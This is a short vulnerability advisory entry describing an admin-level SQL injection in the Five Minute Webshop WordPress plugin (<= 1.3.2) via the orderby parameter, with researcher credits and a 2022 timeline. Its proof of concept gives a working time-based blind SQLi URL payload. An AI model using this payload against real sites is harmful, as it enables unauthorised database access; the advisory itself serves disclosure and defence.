WordPress Plugin Vulnerabilities

Five Minute Webshop <= 1.3.2 - Admin+ SQLi via orderby

Description

The plugin does not properly validate and sanitise the orderby parameter before using it in a SQL statement via the Manage Products admin page, leading to an SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=fmwes_products&orderby=id+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-05-11 (about 2 years ago)
Added
2022-05-12 (about 2 years ago)
Last Updated
2022-05-13 (about 1 years ago)

Other